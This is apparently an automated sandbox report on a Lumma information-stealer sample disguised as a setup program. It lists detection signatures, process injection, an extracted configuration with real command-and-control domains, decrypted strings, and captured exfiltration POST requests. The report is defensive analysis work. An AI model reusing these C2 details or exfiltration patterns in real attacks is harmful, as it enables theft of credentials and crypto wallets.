Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5Setup.exe

Overview

General Information

Sample name:5Setup.exe
Analysis ID:1541177
MD5:535428c4f1622391fa1f79d1210a308e
SHA1:f71f258f43d7734f92e6df408462c77db43e3ffa
SHA256:624c18c86535bd12147f839b0b40e68d1596d12e8c20248bf164f331319a7edf
Tags:exeLummaStealerwingouser-ramirezrick2
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 5Setup.exe (PID: 4960 cmdline: "C:\Users\user\Desktop\5Setup.exe" MD5: 535428C4F1622391FA1F79D1210A308E)
    • BitLockerToGo.exe (PID: 6512 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["fashionablei.sbs", "mediavelk.sbs", "ostracizez.sbs", "elaboretib.sbs", "arenbootk.sbs", "offybirhtdi.sbs", "strikebripm.sbs", "activedomest.sbs", "definitib.sbs"], "Build id": "tLYMe5--2"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.1880927609.0000000001F56000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000000.00000002.1880927609.0000000002058000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          00000000.00000002.1880927609.0000000002002000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            0.2.5Setup.exe.20ae000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0.2.5Setup.exe.2002000.4.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                1.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  0.2.5Setup.exe.2058000.2.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    0.2.5Setup.exe.20ae000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T14:42:20.261247+020020546531A Network Trojan was detected192.168.2.449736188.114.96.3443TCP
                      2024-10-24T14:42:23.149975+020020546531A Network Trojan was detected192.168.2.449737188.114.96.3443TCP
                      2024-10-24T14:42:33.574427+020020546531A Network Trojan was detected192.168.2.449745188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T14:42:20.261247+020020498361A Network Trojan was detected192.168.2.449736188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T14:42:23.149975+020020498121A Network Trojan was detected192.168.2.449737188.114.96.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T14:42:31.244380+020020480941Malware Command and Control Activity Detected192.168.2.449743188.114.96.3443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0.2.5Setup.exe.2058000.2.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["fashionablei.sbs", "mediavelk.sbs", "ostracizez.sbs", "elaboretib.sbs", "arenbootk.sbs", "offybirhtdi.sbs", "strikebripm.sbs", "activedomest.sbs", "definitib.sbs"], "Build id": "tLYMe5--2"}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: offybirhtdi.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: activedomest.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: arenbootk.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: mediavelk.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: definitib.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: elaboretib.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: strikebripm.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: ostracizez.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: fashionablei.sbs
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                      Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--2
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041D667 CryptUnprotectData,1_2_0041D667
                      Source: 5Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                      Source: 5Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: BitLockerToGo.pdb source: 5Setup.exe, 00000000.00000002.1880927609.0000000001E08000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: BitLockerToGo.pdbGCTL source: 5Setup.exe, 00000000.00000002.1880927609.0000000001E08000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h1_2_00446040
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18E26AFFh]1_2_00423330
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h1_2_00423330
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h1_2_004464F0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al1_2_004309A1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al1_2_004309A1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esi+ecx+77CF5801h]1_2_004309A1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax1_2_00426B58
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-411B9734h]1_2_00420D60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00420D60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], C0A4C970h1_2_00446E50
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9ABDB589h1_2_0042EE3D
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-27h]1_2_0040FE86
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-27h]1_2_0040FE86
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000106h]1_2_0040DE90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 9ABDB589h1_2_00429FE0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h1_2_00401000
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h1_2_00401000
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [edi+34h], 00000001h1_2_00409006
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h1_2_0042C020
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx1_2_004110D7
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, eax1_2_00422090
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4E2BFA43h]1_2_00441100
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+548844AEh]1_2_00445120
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+4FFEBE6Ch]1_2_0040D1F0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx1_2_0040D1F0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax]1_2_0042F1A2
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h1_2_004012D5
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+1Ch], F2EEECF6h1_2_0042D3EA
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax1_2_0042D3EA
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h1_2_0042C390
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], al1_2_00430417
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edi1_2_004454D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_00431495
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [00450498h]1_2_0043D4B8
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h1_2_0043D4B8
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx1_2_004215AD
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h1_2_00444640
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 16194952h1_2_00444640
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx1_2_004216C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h1_2_0041C692
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx1_2_0041C692
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h1_2_00425770
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax1_2_0042C7DC
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esi+20h]1_2_0042A7E2
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]1_2_00405850
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edi1_2_00445800
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx1_2_0041F8A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3568C09Bh1_2_0041F8A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_0041F8A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+ecx+02h], 0000h1_2_004218B0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00439970
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000A1h]1_2_0042D9C5
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edi]1_2_00443A33
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], dl1_2_0042EAF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00423B40
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [eax]1_2_00423B40
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3602324Eh1_2_00446B70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, word ptr [eax]1_2_00446B70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*4+000004A8h]1_2_0040BC40
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp edx, 02h1_2_0040BC40
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_0042CC5F
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+4E2BFA47h]1_2_0043FC90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]1_2_0042CD09
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042DE60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]1_2_00443E80
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx1_2_0041CFDD
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], al1_2_00430FFE
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+4Ch]1_2_0042CD09

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 188.114.96.3:443
                      Source: Malware configuration extractorURLs: fashionablei.sbs
                      Source: Malware configuration extractorURLs: mediavelk.sbs
                      Source: Malware configuration extractorURLs: ostracizez.sbs
                      Source: Malware configuration extractorURLs: elaboretib.sbs
                      Source: Malware configuration extractorURLs: arenbootk.sbs
                      Source: Malware configuration extractorURLs: offybirhtdi.sbs
                      Source: Malware configuration extractorURLs: strikebripm.sbs
                      Source: Malware configuration extractorURLs: activedomest.sbs
                      Source: Malware configuration extractorURLs: definitib.sbs
                      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 75Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18159Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8780Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20433Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7094Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7126Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1243Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1117Host: fashionablei.sbs
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 110Host: fashionablei.sbs
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: fashionablei.sbs
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fashionablei.sbs
                      Source: 5Setup.exeString found in binary or memory: http://.css
                      Source: 5Setup.exeString found in binary or memory: http://.jpg
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                      Source: 5Setup.exeString found in binary or memory: http://html4/loose.dtd
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: BitLockerToGo.exe, 00000001.00000003.1947013541.00000000054A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: BitLockerToGo.exe, 00000001.00000003.1920231842.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
